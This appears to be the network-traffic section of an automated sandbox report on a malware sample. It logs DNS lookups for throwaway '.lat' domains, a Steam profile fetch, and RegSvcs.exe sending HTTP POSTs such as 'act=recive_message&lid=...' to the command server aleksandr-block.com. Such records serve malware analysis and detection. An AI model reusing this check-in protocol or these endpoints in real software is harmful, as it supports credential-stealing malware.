                                                                    Jan 14, 2025 08:27:15.183260918 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.183278084 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.183293104 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.183300018 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.259371996 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.259443045 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.259522915 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.259901047 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.259915113 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.727472067 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.727636099 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.931159973 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.931222916 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.931700945 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.935005903 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.935162067 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.935195923 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.935256004 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.935267925 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.163667917 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.163770914 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.163899899 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.164046049 CET49738443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.164076090 CET44349738188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.182648897 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.182696104 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.182790041 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.183168888 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.183178902 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.658905029 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.659035921 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.660507917 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.660521984 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.660743952 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:17.668788910 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.668927908 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:17.668943882 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:18.480849981 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:18.481098890 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:18.481194973 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:18.481254101 CET49740443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:18.481276989 CET44349740188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:18.556162119 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:18.556216955 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:18.556282997 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:18.556704998 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:18.556725979 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.021635056 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.021811962 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.023178101 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.023204088 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.023607969 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.024904013 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.025190115 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.025233030 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.025324106 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.025336027 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.638278961 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.638382912 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.638552904 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.638761997 CET49741443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.638780117 CET44349741188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.818252087 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.818305016 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:19.818382025 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.818726063 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:19.818738937 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:20.288928032 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:20.289083958 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:20.290602922 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:20.290622950 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:20.290887117 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:20.292576075 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:20.292689085 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:20.292700052 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:21.333800077 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:21.333913088 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:21.334022999 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:21.334233046 CET49743443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:21.334259033 CET44349743188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:21.681433916 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:21.681528091 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:21.681701899 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:21.681955099 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:21.681972027 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.160110950 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.160237074 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.162250996 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.162266970 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.162581921 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.164169073 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.164400101 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.164428949 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.164531946 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.164560080 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.164673090 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.164714098 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.164840937 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.164871931 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:22.164967060 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:22.164988041 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.371710062 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.371819019 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.371893883 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.372198105 CET49745443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.372225046 CET44349745188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.378184080 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.378249884 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.378324032 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.378642082 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.378657103 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.845788956 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.845891953 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.847424030 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.847443104 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.847768068 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:24.849092007 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.849128962 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:24.849200964 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:25.345873117 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:25.345995903 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:25.346074104 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:25.346295118 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:25.346326113 CET44349748188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:25.346338987 CET49748443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:25.346344948 CET44349748188.114.96.3192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 14, 2025 08:27:11.792084932 CET4944753192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.801541090 CET53494471.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.805855036 CET5898453192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.814053059 CET53589841.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.817677021 CET6054953192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.826939106 CET53605491.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.830324888 CET5690153192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.838896036 CET53569011.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.848565102 CET6004853192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.857649088 CET53600481.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.877254963 CET6472053192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.886056900 CET53647201.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.893390894 CET6071553192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.901957989 CET53607151.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.905812025 CET5409353192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.915172100 CET53540931.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.927906036 CET5385553192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.938083887 CET53538551.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:11.943125963 CET5842153192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:11.949949980 CET53584211.1.1.1192.168.2.4
                                                                    Jan 14, 2025 08:27:13.327888012 CET5374153192.168.2.41.1.1.1
                                                                    Jan 14, 2025 08:27:13.335834026 CET53537411.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 14, 2025 08:27:11.792084932 CET192.168.2.41.1.1.10x1c10Standard query (0)curtainykeo.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.805855036 CET192.168.2.41.1.1.10x8741Standard query (0)bloodyswif.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.817677021 CET192.168.2.41.1.1.10x353cStandard query (0)washyceehsu.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.830324888 CET192.168.2.41.1.1.10x5352Standard query (0)leggelatez.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.848565102 CET192.168.2.41.1.1.10xbebdStandard query (0)miniatureyu.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.877254963 CET192.168.2.41.1.1.10x4a9dStandard query (0)kickykiduz.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.893390894 CET192.168.2.41.1.1.10x2250Standard query (0)savorraiykj.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.905812025 CET192.168.2.41.1.1.10xb2e8Standard query (0)shoefeatthe.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.927906036 CET192.168.2.41.1.1.10x221fStandard query (0)finickypwk.latA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.943125963 CET192.168.2.41.1.1.10x501aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:13.327888012 CET192.168.2.41.1.1.10x26a6Standard query (0)aleksandr-block.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 14, 2025 08:27:11.801541090 CET1.1.1.1192.168.2.40x1c10Name error (3)curtainykeo.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.814053059 CET1.1.1.1192.168.2.40x8741Name error (3)bloodyswif.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.826939106 CET1.1.1.1192.168.2.40x353cName error (3)washyceehsu.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.838896036 CET1.1.1.1192.168.2.40x5352Name error (3)leggelatez.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.857649088 CET1.1.1.1192.168.2.40xbebdName error (3)miniatureyu.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.886056900 CET1.1.1.1192.168.2.40x4a9dName error (3)kickykiduz.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.901957989 CET1.1.1.1192.168.2.40x2250Name error (3)savorraiykj.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.915172100 CET1.1.1.1192.168.2.40xb2e8Name error (3)shoefeatthe.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.938083887 CET1.1.1.1192.168.2.40x221fName error (3)finickypwk.latnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:11.949949980 CET1.1.1.1192.168.2.40x501aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:13.335834026 CET1.1.1.1192.168.2.40x26a6No error (0)aleksandr-block.com188.114.96.3A (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 08:27:13.335834026 CET1.1.1.1192.168.2.40x26a6No error (0)aleksandr-block.com188.114.97.3A (IP address)IN (0x0001)false
                                                                    • steamcommunity.com
                                                                    • aleksandr-block.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449730104.102.49.2544437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:12 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Host: steamcommunity.com
                                                                    2025-01-14 07:27:13 UTC1905INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    Cache-Control: no-cache
                                                                    Date: Tue, 14 Jan 2025 07:27:13 GMT
                                                                    Content-Length: 35141
                                                                    Connection: close
                                                                    Set-Cookie: sessionid=13f105d58e50524f0302c55b; Path=/; Secure; SameSite=None
                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                    2025-01-14 07:27:13 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                    2025-01-14 07:27:13 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                    Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                    2025-01-14 07:27:13 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                    Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
                                                                    2025-01-14 07:27:13 UTC510INData Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
                                                                    Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449732188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:13 UTC266OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2025-01-14 07:27:14 UTC1127INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=t6t8t2i8vgtqp1vstoaihu4mrq; expires=Sat, 10 May 2025 01:13:53 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ruyNxFrLfi%2FdZDHGNycCtCf0ukzuIgatLExrwKw9zHG%2BCoy75C24i%2Fop8oWcMalA53ax7ZvCPCAWMLsZWRbJTlk3aAWQdQWn6mgMPucs6jpJ%2FucYmCovvbcS1XxtYUm7YMcj2AkJ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be6ffedb30f6b-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1629&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1755862&cwnd=210&unsent_bytes=0&cid=f8003cd52eee2a59&ts=451&x=0"
                                                                    2025-01-14 07:27:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    2025-01-14 07:27:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449736188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:14 UTC267OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 49
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:14 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 61 74 78 4f 54 31 2d 2d 74 72 61 66 66 31 32 26 6a 3d
                                                                    Data Ascii: act=recive_message&ver=4.0&lid=atxOT1--traff12&j=
                                                                    2025-01-14 07:27:15 UTC1131INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=kn88eo0gqsao5o357k29alr7l2; expires=Sat, 10 May 2025 01:13:53 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ArkNzfMuCj1a8MurFsMesbfJ2w3%2Bu52gyAE5%2BTu1RLJlmIDOxaztwMpfKa4jEIUSMPVzUxzS6KWtrNdrfd%2Bcz8bGlg6%2F%2BLvRCfBBL4HQmbBjko2BLeNxn2DarSYha5QE%2BmKVQ2tA"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be7058c077c90-EWR
